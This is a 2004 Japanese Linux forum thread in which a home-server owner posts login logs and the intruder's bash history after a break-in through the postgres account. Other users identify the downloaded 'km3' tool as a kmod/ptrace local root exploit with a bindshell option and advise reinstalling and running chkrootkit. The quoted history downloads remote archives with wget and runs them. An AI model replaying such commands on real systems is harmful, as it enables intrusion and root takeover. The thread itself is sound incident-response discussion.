自宅サーバが進入されました。

2004年11月16日 15:47 by ELF 上鍵
先日、自宅のLinuxサーバに不正に進入されてしまいました。
原因は、自分の管理ミスであったのですが、確認出来たログを載せますので何をされたか解る方がいましたら、情報をお願いします。

lastのログ
--------------------------------------------
postgres pts/1 80.97.66.209 Tue Oct 19 05:51 - 05:55 (00:04)
postgres pts/2 211.251.71.2 Tue Oct 19 01:39 - 01:39 (00:00)
postgres pts/1 80.97.66.209 Tue Oct 19 01:39 - 02:08 (00:28)
postgres pts/1 211.251.71.2 Tue Oct 19 01:37 - 01:37 (00:00)
--------------------------------------------

/home/postgres/.bash_history
--------------------------------------------
w
uname -a
cat /etc/hosts
cat /etc/issue
cd /tmp
ls -a
wget members.xoom.it/racovita/0.tar.gz
wget members.xoom.it/racovita/l.tgz
tar xzvf 0.tar.gz
rm -rf 0.tar.gz
./0
rm -rf 0
tar xzvf l.tgz
rm -rf l.tgz
./km3 -d
passwd
killall -9 socklist
exitr
exit
--------------------------------------------

#postgresのパスワードは変更後、サーバの電源は切っています。

レス

1: 口コミさん
パスワード換えとバックドアだなきっと。

rootは取られてないと思うんで、システムファイルの変更はないだろうけど、バックドアがずっとパスワードクラックorルート昇格を試みてるかもしれないから、データだけバックアップ取ってOS再インストールが良好。

とりあえず/var/logはバックアップ取って昇格とパスワードクラックの形跡がないか調べるよろし。

あとはまぁ、実際にwgetで落とされたファイルを自分でも落としてみて、どんなツールなのか調べるとか。

やれることはいっぱいある、電源落ちているならこれ以上の被害もないだろう。

2004-11-16 15:56

2: 口コミさん
Usage: %s [-d] [-b] [-r] [-s] [-c executable]
-d -- use double-ptrace method (to run interactive programs)
-b -- start bindshell on port 4112
-r -- support randomized pids
-c -- choose executable to start
-s -- single-shot mode - abort if unsuccessful at the first try
Linux kmod + ptrace local root exploit by <anszom@v-lo.krakow.pl>

だそうで>km3
root取られてるかもね〜
lsとかpsとかnetstatとかも置き換わってるかも。
色々コマンド差し替えられてるとおもうので、データ救って放棄
してしまうのが良いです(興味が無いなら)。ただし、その箱(から
/へ)外(に/から)接続できないようにした上でどうぞ。

2004-11-16 19:15

3: 口コミさん
あえてろ〜ずさんのに付け加えるなら。
KNOPPIXから起動してchkrootkit -r してみるところだな。私なら。
まぁ、root取られるとかしてないと思うけど。

2004-11-16 19:20

4: 口コミさん
> ろ〜ず さん
アドバイスありがとうございます。
/var/logには、該当しそうな時間には、下記の様なログが複数回残っているだけでそのほかには、関連しそうなログは、みつけられませんでした。

Oct 19 01:46:00 ns2 modprobe: modprobe: Can't locate module net-pf-22


>minemaz さん
確認ありがとうございます。
さすがにこのままの状態では、怖いので、初期化して、再インストールします。


>oddmake さん
アドバイスありがとうございます。
chkrootkit -r を実行してみたのですが、何も引っかからなかったです。

2004-11-16 23:56

5: 口コミさん
chkrootkitとclamavでのウィルススキャンをして引っかからなかったら、
次はSELinuxの導入を検討した方がいいと思います。
かくいう私もSELinuxは手探り状態ですが…

2004-11-20 00:09

スレッド一覧

【求人】港区でのお仕事です【時給1700円以上】 12/08/29 16:26 【急募・東京】プログラマー&デザイナー 12/06/05 17:21 Ubuntu11.10でバッファローNASLS-V2.0TLを使いたい 12/01/14 00:10 crontabでcommandを5秒単位で指定する方法を教えてください 10/09/03 00:10 メールサーバ、明日お昼まで受付。ご教示ください&疑問お答えします。sendmailをマスターしたい。 10/09/16 20:21 Linux 10/03/14 16:18 Fedora Core4マニュアル 10/04/23 13:53 USBメモリからブートする方法 10/02/24 22:50 MTA(ウィルス対策付き)のテスト方法について 09/08/18 13:48 ICMP Destination host administratively 09/06/10 20:20 真剣に聞きたいのだが、Ubuntuの何が良いの? 08/07/08 22:53 FMV-BIBLO LOOX P70でタッチパネル成功した方 09/01/15 23:41 OSのリストア 08/09/04 19:22 syslog-ngってロストしますか? 08/06/17 20:32 HDDから情報の救出。助けてください。 08/04/18 04:31 [Q] bdflushの設定値について 08/04/09 16:20 質問: egrepにおける正規表現の記述 08/02/26 22:41 inodeを増やす方法 07/12/30 01:17 セキュリティについて 07/11/25 07:29 CDからの曲の取り込みとその管理、視聴 07/10/19 15:24 FedoraCoreファンの集い 07/10/20 15:30 VMware Workstation v6.0の使い方 07/08/06 23:15 Ruby on Rails 現場ノウハウ講座(β) 07/03/14 03:09 ネットをするための設定は?><) 06/10/29 10:40 gcovとlcovについて。 06/10/20 00:23 教えてください。 06/09/28 21:54 RAIDが壊れたとき 06/10/11 14:45 ffmpegをインストールしようとするとエラーが発生します。 06/09/29 20:11 無線Linux考 06/06/24 17:30 内部向けDNS設定 06/06/10 18:29 日本語がCUI画面で文字化けします。 06/05/27 14:07 「YouOS」というものについて 06/05/28 21:54 Linuxが動くノートPCを教えてください 05/11/17 16:41 HHKBの相性 05/06/29 08:41 情報源 05/04/30 01:31 サーバ構築時のソフトウェアインストール 11/04/02 17:43 Ubuntuでネット How to? 11/02/27 18:39 diffコマンドで,連続行の変更を1行ずつ取得する方法 10/12/18 17:13 ロシア、リナックス基盤に国産OS開発へ 10/09/18 02:05 zenwalk linux 使っている人いますか? 10/04/02 18:20 Linux Mint 10/02/28 10:05 ネットブックで自宅サーバやってる方いませんか? 09/07/01 03:06 参加者を募集しています。 09/06/06 18:29 EeePC 4GのSDカードに 09/01/04 22:10 linuxディストリビューションの種類・特徴・メリット・デメリットを教えてください 08/07/20 10:06 アシスタント求人募集 08/10/07 22:18 fedoraネットワーク 08/09/01 22:05 リモートデスクトップについて 07/10/29 19:23 SLAX-6rc6の日本語化 07/08/26 16:02 シェルスクリプトを使ったsftp接続 07/07/31 11:03 中古のパソコンに入れるなら 07/05/24 07:44 Mplayerのインストール 07/04/08 19:42 ウィルス対策 05/05/30 20:52 vmwareにインストールしたCentOSをteratermで操作するやり方 06/07/02 00:42 ビジネスにおけるLinuxの未来をは・・・? 06/06/18 21:22 Hackの内容、ご教授願いたい。 06/05/31 21:56 linuxっていろいろあるけど 06/05/16 16:54 Windowsユーザーの初Linuxはどれが? 05/10/07 01:01 NFS について 06/04/14 19:26 パソコンの名前 06/03/09 09:56 Linux のための Google Earth 06/03/04 08:57 はじめましてぇ〜! 06/02/09 21:55 「run-crons」について教えてください。 05/12/08 18:10 プリンター/スキャナー 05/11/25 15:58 Linux でも動く mpeg4 H/Wキャプチャボックス 05/08/03 18:15 はじめまして。 05/08/06 15:09 TUXくんグッズ 05/06/03 13:15 デュアルモニター 05/02/01 18:26 coLinux 05/01/27 14:11 Linuxを使った便利システム 05/01/20 15:45 XMMSって… 04/11/22 17:49 Linuxデスクトップでウイルス 04/10/25 23:30 HP のマルチユーザー PC 04/07/11 15:43 LinuxWorld Expo/Tokyo 2004 04/05/28 22:24 Oracle Linux最強説 12/02/29 00:45 fedora 12にてインターフェースの設定 11/05/08 14:04 http://xx.xx/cgi-bin/x.prgでCGIプログラムを実行したい。 11/04/27 09:30 Couch DBの入門書 著者求む 11/04/28 01:30 【質問】 Ocsigen のインストール方法 10/06/13 14:15 画面に何も映らない。セーフモード 10/05/08 11:16 Xenの管理OSでアプリケーションをの動かしてもいい? 08/09/25 01:57 LPIC試験への道。 08/07/22 16:41 fedora7インストールについて 08/04/18 08:33 Fedora8の設定について教えてください。 07/12/11 07:03 Quad Coreでのパフォーマンス 07/12/14 18:30 技術者を急募しています。 06/09/27 14:09 仕事。 06/10/16 23:00 Linuxで使うアプリは? 06/09/09 22:16 救ってください 06/05/26 18:57 <質問>デスクトップでエラー 06/01/17 00:59 ASUS M6R 740 NOTEBOOK に相応しいLINUX? 05/09/01 03:09 linuxは重たい?>WinXP 05/07/31 03:10 初心者向け研修―Red Hat社のトレーニングってどうでしょう? 05/04/27 02:58 パーティションを切る 05/04/19 21:18 今月のWindows系や自作DOS/V機系の雑誌にKNOPPIXのCDが付いてますね(^_^)。 04/12/11 16:13 自宅サーバが進入されました。 04/11/16 15:47 /dev/memって 04/06/19 01:16 Xbox Linux 04/04/04 21:10 fedoraがフリーズします 12/04/24 22:01 for文について 12/04/30 11:26 サーバエンジニア募集中! 12/02/07 17:10 新しいインターフェースが設定できない 12/01/07 11:38 Slackware13.0のcifsでマウントしたファイルシステムの上でコンパイルしようとするとリンクに失敗する 11/05/07 22:11 Linux の良さ 10/12/19 23:33 おすすめ書籍を教えてください 10/10/21 21:39 オープンソースの先駆けと対NDS宣戦布告 09/11/04 01:58 kernel hackに関する質問 #0x00 09/07/03 23:25 USBフラシュメモリーにLiveCDのLinuxを入れて持ち運ぶ 09/05/20 23:08 rootからuserに戻る方法? 09/04/12 23:04 Linux 標準バンドルされている 暗号化ライブラリを教えてください 09/03/10 23:39 linuxとwindowsの狭間で 08/07/20 10:08 京都Linux友の会 08/11/08 14:18 linuxで1を変数01に変更して変数に格納する方法について。 08/09/02 23:29 モジュールとドライバの違いは? 08/08/17 11:17 SSLの設定方法について 07/11/27 22:39 Knoppixをインストールしたい。 07/09/27 12:53 漢字をかな変換するコマンド 07/08/21 12:40 【ノートPCで】タッチパッドが動かない!!HP 500 Notebook PC【LINUXを稼動♪】 07/04/08 16:37 usermodなどの使い方を教えてください。 07/04/04 02:31 ファイル特定の文字の出力方法に関して。 06/11/12 04:08 UbuntuでのWLI-U2-KG54使用について 06/10/23 22:09 PlayStation Linux Users Group(PSLUG) のコミュニティを立ち上げました。 06/05/20 01:53 linux超初心者です。 06/05/14 21:04 time 複数コマンド 06/02/28 10:03 無線LAN環境は? 06/02/28 01:40 おしえてください 06/02/23 13:41 Linuxはじめてみようと思ってます。 05/12/01 22:42 一番、サーバーに向いているディストリってなんですかね? 05/12/05 06:20 LINUX関連の本、サイト 05/11/16 23:09 さしあげます 05/09/24 18:50 パーミッション、所有者のバックアップ 05/08/01 01:18 Linuxルータ 05/03/25 00:23 オープニングパーティはいつですか? 04/04/04 04:26 Kobo Touch と、その拡張性について質問 12/07/06 01:17 はじめまして 11/01/16 12:16 红旗 Linux 。。。??? 09/10/03 02:48  会社や学校で使っている環境は? 09/05/17 20:24 リスク管理 09/02/01 19:35 【求人】 Linuxサーバ・ネットワーク管理者急募! 09/01/07 12:51 NFSで " No such file or directory"が発生する 09/01/02 12:02 メモリー128MBのノートパソコンにでインターネットに接続したい。 08/07/07 21:04 どーすれば!? 08/07/24 22:59 [Q]Canon LBP5100を使う 07/11/05 14:25 WebSphere Application Server のインストール方法 07/06/29 00:21 複数台のNFSサーバーを自動的にマウントしてくれるソフトウェアってありますか? 07/05/21 12:39 delegate 07/04/09 19:59 無線LAN(bcm43xx)使えたのに災難?ログの山 07/04/14 17:04 mysqlのインストールについて。 07/03/08 16:00 linuxをyahooBBでインターネットをするには? 06/12/11 23:03 IDE 06/12/01 21:48 Microsoft と Novell の提携 06/11/04 11:40 Fedora Core5 06/10/12 20:57 「コミュニティ利用で気をつけてほしいこと」を掲載しました 06/07/04 12:24 初歩的な事なのでしょうが 06/06/12 16:02 apache 06/06/01 14:48 LinuxとEMT64 06/01/29 12:56 スクリーンセーバ 05/07/02 00:19 自宅鯖に使えるUPS 04/11/19 16:52 デュアル CPU の功罪 04/11/08 03:54 Open Source Conferlence 2004 04/10/16 23:50 SELinux勉強会(4/17・渋谷) 04/04/06 12:13 Cloud話よろず 12/03/19 12:09 Cron Jobが実行されない 12/01/05 11:30 初心者用のくだらない質問トピック #3 09/06/27 17:59 mozc(モズク)コミュ作成しました 11/03/21 13:50 sk_buffのh.rawって何を表していますか? 11/02/15 20:50 DNS 10/06/25 01:11 皆さんは日本語入力メソッドに何使っていますか? 10/03/23 16:44 shell作成で悩み 09/05/13 20:47 あるユーザだけ作成できても、SSH/FTP/SFTPできない。 09/10/23 05:46 vsftpd 09/09/09 20:45 topについて 09/03/16 01:55 apacheが起動しているか確認するコマンドについて 08/11/29 12:12 sshをパスワードなしでログインする 08/11/01 10:45 おすすめの本ってありますか? 08/05/07 20:57 SUSEについて 08/07/04 09:01 初心者用のくだらない質問トピック 06/07/22 10:13 WEBカメラを設定しWebで公開したい 07/12/17 00:00 rootで入れないみたいです。。 07/10/18 03:31 Libretto L1にturbolinuxFUJIをインストしたい 07/08/26 22:40 NFSサーバーでCommitted_ASが日に日に増えていく 07/07/18 13:13 smtpfeedの設定 07/07/17 15:51 Linuxで無線LANを使いたい 07/06/23 08:56 TIPS 07/06/20 23:52 大量のファイルを保存するNFSサーバーに最適なファイルシステム 07/05/31 02:09 Linuxリモートインスト無償配布 06/09/08 02:38 Grubについて教えてください。 06/07/18 04:11 zxLinux 06/04/23 23:17 苦労人志向 06/02/21 06:59 インストール時の設定 06/02/04 11:53 gentoo 05/12/09 02:24 powerPCG4へLinuxのインストールについて質問 05/12/18 16:11 Open sourceについて。。。。 05/09/24 22:35 HDDベンチマーク 05/07/08 00:33 輸入ノート売ってるような店 05/06/29 10:02 音ユースにグッドなLinux向けノートって? 05/06/13 01:00 mountする方法 05/05/31 09:43 クールに冷えるCrusoe! なサーバー on Linux 05/04/05 22:00 REVOLUTION OS 05/02/15 20:17 Linux World C&D/Tokyo 2004 レポート 04/10/13 10:19 5/4 『Linux ユーザーグループ北陸 勉強会』のご案内 04/04/28 22:45 初心者用のくだらない質問トピック #4 11/07/13 11:20 Linux デスクトップの普及#2 11/05/24 02:10 LPIC 11/06/29 01:09 CentOSでのVASPのビルドについての質問。 11/10/14 18:22 TurboLinux 11Server SVNのインストール 10/06/23 23:55 TurboLinux 11 Server (Musasabi) で PostgreSQL 教えてください 10/06/17 23:55 openssl remove.....復旧 10/05/27 16:33 暗号化DVDの作成方法 10/01/23 00:51 Linuxトラブル・・・ 09/09/20 18:29 ブート時:TUX君の数? 09/09/22 10:33 課題投稿 09/07/09 09:03 オリジナルディストリの作り方をご存じの方ご教授願います 09/07/02 23:12 ブートLinuxでVistaの修復の仕方は? 09/05/19 22:30 読まれている雑誌 09/03/30 01:00 Linuxを前提としたパソコン購入 08/12/03 00:40 アナログビデオが一杯 08/09/28 12:47 愛用のLinuxは? 05/01/27 17:57 質問です。 08/02/02 03:25 Active Sync 07/12/23 11:16 Linux Ubuntuのフリーズについて 07/07/29 01:40 PC版i386vineをインストールしてサーバ運用したいです。 07/07/18 00:01 グラフィックボードが合わない件について 07/04/30 00:19 ネットワークについて 07/03/16 19:47 教えてください 07/02/19 01:17 UW-IMAPの情報・・ 06/12/26 21:54 XglとAIGLXって凄そう!試した? 06/12/21 23:25 Linuxを使う理由 06/05/28 23:34 アドレスにアンダーバーがあるとsendmailがメールを送れない? 06/07/06 22:45 WinXPとのデュアルブート 06/03/02 10:46 tarの脆弱性 06/04/19 13:13 Linuxをwebサーバとして利用する際のハードのスペック 06/03/07 16:15 【質問】 デュアルブート環境下で同時起動 05/12/14 15:11 kernel-2.6.13.X でのリブート 05/09/13 13:14 LW2005 05/06/04 00:47 Virtual PC 2004上でFedora Core 3は動くの?? 05/03/15 10:02 UNIXとの違いって? 05/02/05 02:15 初めまして 08/03/12 21:41 NFS Mountの設定ヘルプ - Fedora 16 12/01/19 15:50 Pidginのプラグイン作成方法について 11/12/26 16:13 (TωT)パソコンの選び方?? 11/10/10 21:22 TeraTermでデータベースをみる方法 11/09/20 17:14 インストールについてです 09/12/01 20:18 おすすめのセミナー 07/11/21 11:21 初心者用のくだらない質問トピック #2 08/02/10 14:29 B フレッツ インターネットの接続方法がわかりません 09/01/06 21:55 slewモード 08/12/13 23:57 LinuxとFOMA a2502k… 08/10/28 22:08 Linuxのすばらしさ 08/07/18 10:21 Linuxを何に使ってますか? 08/07/12 03:07 【質問】FlowScan をインストールしたい 08/04/08 13:42 You tube downloder for Ubuntu 08/04/12 15:18 NFSのチューニングについて 08/04/08 02:41 USBフラッシュメモリ 07/08/21 23:04 usb接続HDを2つ接続したときのデバイスファイルの固定について 07/07/28 09:37 netscapeを使えるようにしたい。 07/07/19 18:56 OS選択の悩み:Windowsは必要か? 07/05/07 10:54 マルチコアCPUに最適化されたLinuxはありますか? 07/04/03 20:49 統合開発環境ってありますか? 06/07/21 22:20 LPICレベル1最新書籍情報について 06/05/15 23:11 lsコマンドでワイルドカードが効きません。 06/05/06 16:36 一番軽いGUI環境 06/04/03 03:48 Novell xgl 06/02/10 15:34 Linuxが使えるネットワークエンジニアとは? 06/01/24 11:55 Linux 派国会議員 05/08/15 09:18 x-windowログ 05/08/03 22:25 私がお勧めするLinux便利機能! 05/08/01 22:50 Windows用無線LANカード 05/07/29 21:50 Linuxを使いはじめた時”すげー”と思ったところ 05/03/09 00:40 nfsrootでpam失敗? 05/06/02 14:58 Linux始めるなら 04/10/16 03:51 もっとも安価で電気代の安いサーバ 04/07/29 01:17 Yellow Dog Linux 04/04/27 12:18 【愛知、常駐プログラマ募集】 12/06/07 00:24 [Q]GPLの解釈について(ソース開示の必要性) 10/11/04 21:07 Linux デスクトップはこんな感じです! 09/01/11 00:34 gvでpdfを表示する方法 10/02/10 23:34 日本でVPS (英語 - English) 09/12/27 23:18 ロードアベレージ 09/09/16 22:08 CPUの可能性 09/05/22 01:25 ご教示下さい 08/11/10 21:19 DellからLinuxプレインストールマシン発売 08/09/05 12:56 fedora9日本語入力メソッドのインストールに悪戦苦闘中です。 08/07/30 14:23 おすすめを問います。 07/11/12 20:33 samba共有ファイルの更新日時について 07/10/13 22:20 LPIC試験勉強に最適なディストリビューションを教えてください。 07/07/25 03:56 CPUの増設方法 07/06/14 17:40 PDFファイル上で動画再生 07/06/05 00:12 Linuxのコマンドで 06/07/01 23:05 監視ツールの導入・運用 06/05/30 00:30 MacintoshにLinuxを入れたい 05/12/07 17:56 SATAの対応は? 05/10/04 20:22 Linus Torvalds、Macにスイッチ! 05/03/10 11:14 GNOME vs KDE 05/01/26 19:37 皮を剥いで見る?!。 04/10/19 05:42 タブレットの設定変更について 12/10/10 22:50 ☆教えて☆Linuxをマスターしたい 09/07/11 13:59 Linux/Unixの経験を活かして海外で働きませんか? 11/10/28 17:43 急成長中のベンチャー企業で働いてみたいとおもいませんか?! 11/08/26 18:43 探してます 11/06/06 19:12 Linux デスクトップの普及 06/11/18 01:55 ■お仕事(=転職)案件のご相談です■ 11/01/24 16:41 問題集につきまして 10/09/13 15:41 Linuxのあるべき姿と今後の未来像 10/09/08 17:26 SSH鍵認証 10/06/17 15:25 Lpicレベル1の講習 09/12/23 22:50 教えてください 09/06/30 17:35 git 09/06/15 23:09 Turbolinux Fuji install 09/05/15 00:41 弐萬圓PC堂? Powered by Linux 09/01/04 19:14 ファイルシステムについて 08/10/21 21:07 転職希望者の方!! 08/09/15 22:46 suidについて 08/08/15 15:33 MXレコードの解決ができず、メールが外部から送受信できません。。 08/07/16 00:19 CentOS5.2+openssh5.0pでchrootできる?? 08/07/31 10:20 sendmailのaliasについて 07/08/09 22:35 Linus さんち 07/06/24 00:42 eth0、eth1の呼び方 07/03/28 15:41 教えてください。 07/03/18 18:53 Squidで/etc/hostsの定義で自分自身を指定した場合 07/03/13 15:25 教えてくださいFlashplayerのPlug-inの方法を 07/02/21 10:50 くだらない質問かもしれませんが… 06/10/24 17:40 ez-ipupdate-3.0.11b7のインストールがうまくいきません 06/07/20 17:55 maildropの入門書 06/06/15 17:42 kernel panic でサーバが止まってます。 06/04/07 11:42 f77 06/03/03 01:14 ご教授お願いします。 06/02/28 07:42 CentOS vs Fedora Core 06/02/21 12:17 初めまして 06/01/25 19:06 外付けHDD 05/07/05 23:22 質問 05/05/06 00:14 rpm パッケージの分解 04/11/01 08:04 Hadoopのクラスタ化について 13/03/12 15:55 Hadoopについて 13/02/12 14:58 pidからstatusを得るAPIって有りますか? 12/10/24 16:24 ●格安IT塾開校★講師は東大卒! 12/10/21 14:47 オープンソースOSのTorrentサイトを公開しました。 12/12/01 06:52

サイト内検索